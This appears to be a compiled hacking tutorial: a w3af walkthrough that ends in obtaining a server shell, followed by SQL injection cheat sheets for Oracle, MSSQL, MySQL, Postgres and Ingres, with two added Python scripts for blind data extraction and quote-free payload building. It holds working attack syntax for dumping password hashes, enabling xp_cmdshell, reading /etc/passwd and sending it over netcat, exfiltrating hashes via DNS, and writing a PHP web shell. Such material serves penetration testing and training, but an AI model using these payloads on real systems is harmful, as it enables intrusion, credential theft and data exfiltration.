Hello everyone, you all know about Metasploit and use it to exploit targets. Good good... but do you know about w3af (Web Application Attack and Audit Framework) by Rapid7? Yes, it is also developed by Rapid7, which is a famous security firm and developed Metasploit. It is not bigger than Metasploit, but it is more powerful than the other web testing tools. OK, now the introduction is over. We proceed to the practical.

Requisites: Python and w3af
Step 1: Open the console and type: target
set target www.site.com
Step 2: Now type: plugins
Step 3: Now we'll look for available plugins to enable them by typing: help
Step 5: Now we'll choose the plugin from the category "audit". Type: audit "name of plugin" (as mentioned in the picture)
You can choose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3>.....
Step 6: If you saw any plugin with the config option marked as "YES" then to configure it type: audit config <plugin>
Step 7: Now type: back
Step 8: Choose another category (if you want): evasion or bruteforce or any one.
Step 9: Now we are ready with our values; to start the scanning type: start scan
Step 10: After finishing the scan, we'll have to exploit the target. So type: exploit
Step 11: Again type: exploit osCommandingShell
Step 12: If everything goes right, we'll get the shell of the server; type: interact 0 (zero)
Part - 3

SQL Injection Cheat Sheet
 Oracle SQL Injection Cheat Sheet
 MSSQL Injection Cheat Sheet
 MySQL SQL Injection Cheat Sheet
 Postgres SQL Injection Cheat Sheet
 Ingres SQL Injection Cheat Sheet
 DB2 SQL Injection Cheat Sheet
 Informix SQL Injection Cheat Sheet
 WordPress Hacking Tricks
 DNS Zone Transfer Vulnerability Exploit
 WHMCS Hacking with Submit Ticket exploit
 WHMCS Auto Exploiter
 Oracle Padding Attack Using Burp Suite
 HTTP NTLM INFORMATION DISCLOSURE
SQL Injection Cheat Sheet

Oracle SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Oracle databases...
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
Comments
SELECT 1 FROM dual -- comment
-- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table name 'dual' when we're not actually selecting from a table.
Current User
SELECT user FROM dual
List Users
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv
List Password Hashes
SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked
SELECT name, spare4 FROM sys.user$ -- priv, 11g
Password Cracker
checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges
SELECT * FROM session_privs; -- current privs
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA Accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles
Current Database
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
List Databases
SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
-- Also query the TNS listener for other databases. See tnscmd (services | status).
List Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
List Tables
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
Find Tables From Column Name
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are uppercase
Select Nth Row
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r = 9; -- gets 9th row (rows numbered from 1)
Select Nth Char
SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'
Bitwise AND
SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns 0
ASCII Value -> Char
SELECT chr(65) FROM dual; -- returns A
Char -> ASCII Value
SELECT ascii('A') FROM dual; -- returns 65
Casting
SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;
String Concatenation
SELECT 'A' || 'B' FROM dual; -- returns AB
If Statement
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
Avoiding Quotes
SELECT chr(65) || chr(66) FROM dual; -- returns AB
Time Delay
BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered/slow
-- Also see Heavy Queries to create a time delay
Make DNS Requests
SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
Command Execution
Java can be used to execute commands if it's installed. ExtProc can sometimes be used too, though it normally failed for me.
Local File Access
UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Hostname, IP Address
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames
Location of DB files
SELECT name FROM V$DATAFILE;
Default/System Databases
SYSTEM
SYSAUX

Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Christian Mehlmauer:
Get all table names in one string
select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()'), ',') from all_tables -- when using union based SQLI with only one row
Blind SQLI in order by clause
order by case when ((select 1 from user_tables where substr(lower(table_name),1,1) = 'a' and rownum = 1) = 1) then column_name1 else column_name2 end -- you must know 2 column names with the same datatype
MSSQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into MSSQL databases... This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version:
SELECT @@version

Comments:
SELECT 1 -- comment
SELECT /*comment*/1

Current User:
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users:
SELECT name FROM master..syslogins

List Password Hashes:
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in an MSSQL error message / some versions of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins -- priv, mssql 2005

Password Cracker:
MSSQL 2000 and 2005 hashes are both SHA1-based. phrasen|drescher can crack these.

List Privileges:
-- current privs on a particular object in 2005, 2008
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user
-- current privs in 2005, 2008
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');
-- who has a particular priv? 2005, 2008
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

List DBA Accounts:
SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'serveradmin' and the other fixed server roles from the documentation
SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? returns 1 for true, 0 for false, NULL for invalid role/username.
SELECT name FROM master..syslogins WHERE sysadmin = '1' -- tested on 2005

Current Database:
SELECT DB_NAME()

List Databases:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

List Columns:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id = master..sysobjects.id AND master..sysobjects.name = 'sometable'; -- list column names and types for master..sometable

List Tables:
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

Find Tables From Column Name:
-- NB: This example works only for the current database. If you want to search another db, you need to specify the db name (e.g. replace sysobjects with mydb..sysobjects).
SELECT sysobjects.name AS tablename, syscolumns.name AS columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'

Select Nth Row:
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row

Select Nth Char:
SELECT substring('abcd',3,1) -- returns c

Bitwise AND:
SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0

ASCII Value -> Char:
SELECT char(0x41) -- returns A

Char -> ASCII Value:
SELECT ascii('A') -- returns 65

Casting:
SELECT CAST('1' AS int);
SELECT CAST(1 AS char)

String Concatenation:
SELECT 'A' + 'B' -- returns AB

If Statement:
IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case Statement:
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Avoiding Quotes:
SELECT char(65)+char(66) -- returns AB

Time Delay:
WAITFOR DELAY '0:0:5' -- pause for 5 seconds

Make DNS Requests:
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
-- Also check out the DNS tunnel feature of sqlninja

Command Execution:
EXEC xp_cmdshell 'net user'; -- priv
-- On MSSQL 2005 you may need to reactivate xp_cmdshell first, as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv

Local File Access:
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;

Hostname, IP Address:
SELECT HOST_NAME()

Create Users:
EXEC sp_addlogin 'user', 'pass'; -- priv

Drop Users:
EXEC sp_droplogin 'user'; -- priv

Make User DBA:
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv

Location of DB files:
EXEC sp_helpdb master; -- location of master.mdf
EXEC sp_helpdb pubs; -- location of pubs.mdf

Default/System Databases:
northwind
model
msdb
pubs -- not on sql server 2005
tempdb

Misc Tips:
In no particular order, here are some suggestions from pentestmonkey readers.
From Dan Crowley: A way to extract data via SQLi with a MySQL backend.
From Jeremy Bae: Tip about sp_helpdb (included in table above).
From Trip: List DBAs (included in table above now):
select name from master..syslogins where sysadmin = '1'
From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008 (included in table above). Also: to check permissions on multiple databases you will have to use the following pattern:
USE [DBNAME]; select permission_name FROM fn_my_permissions(NULL, 'DATABASE')
Note also that when using this data in a UNION query a collation error could occur. In this case a simple trick is to use the following syntax:
select permission_name collate database_default FROM fn_my_permissions(NULL, 'DATABASE')
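The "Select Nth Char", "Char -> ASCII Value" and "Bitwise AND" rows in the Oracle and MSSQL sheets above exist for one job: pulling data out when the page shows nothing but a true/false difference. The following is an added example, my own code rather than anything from the cheat sheets, that automates that loop against a constructed, deliberately vulnerable lookup. sqlite3 stands in for the real backend so the example runs offline; its unicode() plays the role of ascii() (Oracle, MySQL, Postgres, MSSQL) and substr() the role of substring() on MSSQL, so the payload shape is the one the sheets give. The table, the row and the secret are made up.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the vulnerable application's database (sample row is made up).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER, login TEXT, secret TEXT)")
_db.execute("INSERT INTO users VALUES (1, 'admin', 'p@ss')")


def vulnerable_lookup(user_id: str) -> bool:
    """Simulates a page that concatenates `id` into its query (deliberately
    vulnerable) and reveals only whether a row came back: a boolean oracle."""
    query = "SELECT login FROM users WHERE id = " + user_id  # no parameterisation
    return _db.execute(query).fetchone() is not None


def bit_is_set(oracle: Callable[[str], bool], expr: str, pos: int, bit: int) -> bool:
    """One yes/no question: is `bit` of character `pos` (1-based) of the SQL
    expression `expr` set?  substr() picks the character, unicode()/ascii()
    turns it into a number and & masks a single bit (the 'Bitwise AND' rows)."""
    mask = 1 << bit
    payload = f"1 AND (unicode(substr(({expr}),{pos},1)) & {mask}) = {mask}"
    return oracle(payload)


def extract_blind(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the string value of `expr` with 7 oracle queries per character
    (bits 6..0 of the ASCII code). Past the end of the string substr() yields ''
    and every bit question is false, which terminates the loop."""
    out = []
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):
            if bit_is_set(oracle, expr, pos, bit):
                code |= 1 << bit
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


def query_count(value_len: int) -> int:
    """Oracle queries spent on a value of value_len characters (+1 terminator probe)."""
    return 7 * (value_len + 1)


if __name__ == "__main__":
    secret = extract_blind(vulnerable_lookup, "SELECT secret FROM users WHERE login='admin'")
    print(secret, "recovered in", query_count(len(secret)), "queries")
```

Seven queries per character is the budget this approach costs; a binary search over the ASCII range with the same substr()/ascii() primitives is the usual alternative, and the sheets' Time Delay rows turn the same boolean question into a timing one when even the true/false difference is not visible.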
MySQL SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into MySQL databases... This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version:
SELECT @@version

Comments:
SELECT 1; #comment
SELECT /*comment*/1;

Current User:
SELECT user();
SELECT system_user();

List Users:
SELECT user FROM mysql.user; -- priv

List Password Hashes:
SELECT host, user, password FROM mysql.user; -- priv

Password Cracker:
John the Ripper will crack MySQL password hashes.

List Privileges:
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts:
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database:
SELECT database()

List Databases:
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv

List Columns:
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables:
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name:
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'

Select Nth Row:
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char:
SELECT substr('abcd',3,1); # returns c

Bitwise AND:
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char:
SELECT char(65); # returns A

Char -> ASCII Value:
SELECT ascii('A'); # returns 65

Casting:
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);

String Concatenation:
SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement:
SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement:
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes:
SELECT 0x414243; # returns ABC

Time Delay:
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests:
Impossible?

Command Execution:
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform.

Local File Access:
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to filesystem

Hostname, IP Address:
SELECT @@hostname;

Create Users:
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users:
DROP USER test1; -- priv

Make User DBA:
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files:
SELECT @@datadir;

Default/System Databases:
information_schema (>= mysql 5.0)
mysql

Postgres SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into PostgreSQL databases... This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version:
SELECT version()

Comments:
SELECT 1; --comment
SELECT /*comment*/1;

Current User:
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

List Users:
SELECT usename FROM pg_user

List Password Hashes:
SELECT usename, passwd FROM pg_shadow -- priv

Password Cracker:
MDCrack can crack PostgreSQL's MD5-based passwords.

List Privileges:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

List DBA Accounts:
SELECT usename FROM pg_user WHERE usesuper IS TRUE

Current Database:
SELECT current_database()

List Databases:
SELECT datname FROM pg_database

List Columns:
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

List Tables:
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)

Find Tables From Column Name:
If you want to list all the table names that contain a column LIKE '%password%':
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';

Select Nth Row:
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth Char:
SELECT substr('abcd',3,1); -- returns c

Bitwise AND:
SELECT 6 & 2; -- returns 2
SELECT 6 & 1; -- returns 0

ASCII Value -> Char:
SELECT chr(65);

Char -> ASCII Value:
SELECT ascii('A');

Casting:
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);

String Concatenation:
SELECT 'A' || 'B'; -- returns AB

If Statement:
IF statements only seem valid inside functions, so aren't much use for SQL injection. See CASE statement instead.

Case Statement:
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A

Avoiding Quotes:
SELECT CHR(65)||CHR(66); -- returns AB

Time Delay:
SELECT pg_sleep(10); -- postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' LANGUAGE 'C' STRICT; SELECT sleep(10); -- priv, create your own sleep function. Taken from here.

Make DNS Requests:
Generally not possible in postgres. However, if contrib/dblink is installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') AS t(result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. "ping pentestmonkey.net".

Command Execution:
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as the postgres/pgsql OS-level user

Local File Access:
CREATE TABLE mydata (t text);
COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by the postgres OS-level user
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time
...
DROP TABLE mydata;
Write to a file:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? passthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php'; -- priv, write files as the postgres OS-level user. Generally you won't be able to write to the web root, but it's always worth a try.
-- A priv user can also read/write files by mapping libc functions.

Hostname, IP Address:
SELECT inet_server_addr(); -- returns db server IP address (or null if using a local connection)
SELECT inet_server_port(); -- returns db server port (or null if using a local connection)

Create Users:
CREATE USER test1 PASSWORD 'pass1'; -- priv
CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time

Drop Users:
DROP USER test1; -- priv

Make User DBA:
ALTER USER test1 CREATEUSER CREATEDB; -- priv

Location of DB files:
SELECT current_setting('data_directory'); -- priv
SELECT current_setting('hba_file'); -- priv

Default/System Databases:
template0
template1
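The "Avoiding Quotes" rows above give one hand-written literal per backend (chr()||chr() for Oracle and Postgres, char()+char() for MSSQL, a hex literal for MySQL). Writing those by hand for anything longer than "AB" is error-prone, so here is an added example, my own code and not part of the cheat sheets, that generates the quote-free form for any ASCII string in each of the four dialects and decodes it back for checking a payload before it is sent. The template placeholder `{value}` is my convention.

```python
import re
from typing import Callable, Dict

# Quote-free string literals per backend, generalising the "Avoiding Quotes" rows
# in the cheat sheets above. Each maps plain text to an SQL expression that
# evaluates to that text without a single ' character in it.
ENCODERS: Dict[str, Callable[[str], str]] = {
    "oracle":   lambda s: "||".join(f"chr({ord(c)})" for c in s),   # chr(65)||chr(66)
    "postgres": lambda s: "||".join(f"CHR({ord(c)})" for c in s),   # CHR(65)||CHR(66)
    "mssql":    lambda s: "+".join(f"char({ord(c)})" for c in s),    # char(65)+char(66)
    "mysql":    lambda s: "0x" + s.encode("ascii").hex().upper(),    # 0x4142
}


def quoteless(value: str, dialect: str) -> str:
    """Return an SQL expression for `value` that contains no ' character."""
    if not value:
        # Oracle treats '' as NULL anyway, and the other forms have no zero-length shape.
        raise ValueError("empty string has no quote-free form")
    if not value.isascii():
        raise ValueError("only ASCII is encoded byte-for-byte here")
    return ENCODERS[dialect](value)


def decode_quoteless(expr: str) -> str:
    """Inverse of quoteless(), for checking a payload before sending it:
    parses a chr()/char() chain or a MySQL hex literal back to text."""
    if expr.lower().startswith("0x"):
        return bytes.fromhex(expr[2:]).decode("ascii")
    return "".join(chr(int(n)) for n in re.findall(r"ch(?:a)?r\((\d+)\)", expr, re.I))


def fill_template(template: str, value: str, dialect: str) -> str:
    """Drop a quote-free literal into an injection template (placeholder {value})
    so the only quote left in the payload is the one closing the original literal."""
    return template.replace("{value}", quoteless(value, dialect))


if __name__ == "__main__":
    for dialect in ENCODERS:
        print(dialect, fill_template("' OR username={value}-- ", "admin", dialect))
```

The MySQL form only works where the hex literal lands in string context (comparison against a string column, CONCAT, LIKE); in numeric context MySQL evaluates 0x61646D696E as an integer, which is the one place the chr()-chain forms are safer.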
Ingres SQL Injection Cheat Sheet

Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier. Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here. This page will probably remain a work-in-progress for some time yet. I'll update it as I learn more. This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet. The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Version:
select dbmsinfo('_version');

Comments:
SELECT 123; -- comment
select 123; /* comment */

Current User:
select dbmsinfo('session_user');
select dbmsinfo('system_user');

List Users:
First connect to iidbdb, then:
SELECT name, password FROM iiuser; -- or
SELECT own FROM iidatabase;

Create Users:
create user testuser with password = 'testuser'; -- priv

List Password Hashes:
First connect to iidbdb, then:
select name, password from iiuser;

List Privileges:
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');

List DBA Accounts:
TODO

Current Database:
select dbmsinfo('database');

List Databases:
SELECT name FROM iidatabase; -- connect to iidbdb

List Columns:
select column_name, column_datatype, table_name, table_owner from iicolumns;

List Tables:
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';

Find Tables From Column Name:
SELECT table_name, table_owner FROM iicolumns WHERE column_name = 'value'

Select Nth Row:
Astoundingly, this doesn't seem to be possible! This is as close as you can get:
select top 10 blah from table;
select first 10 blah from table;

Select Nth Char:
select substr('abc',2,1); -- returns 'b'

Bitwise AND:
The function "bit_and" exists, but seems hard to use. Here's an example of ANDing 3 and 5 together. The result is a "byte" type holding the single byte 0x01 (3 AND 5 = 1):
select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> Char:
TODO

Char -> ASCII Value:
TODO (The "ascii" function exists, but doesn't seem to do what I'd expect.)

Casting:
select cast(123 as varchar);
select cast('123' as integer);

String Concatenation:
select 'abc' || 'def';

If Statement:
TODO

Case Statement:
TODO

Avoiding Quotes:
TODO

Time Delay:
??? See the Heavy Queries article for some ideas.

Make DNS Requests:
TODO

Command Execution:
Impossible?

Local File Access:
TODO

Hostname, IP Address:
SELECT dbmsinfo('ima_server')

Location of DB files:
SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value' -- primary location of db
SELECT lname FROM iiextend WHERE dname = 'value' -- extended location of db
SELECT area FROM iilocations WHERE lname = 'value' -- all areas (ie directories) linked with a location

Default/System Databases:
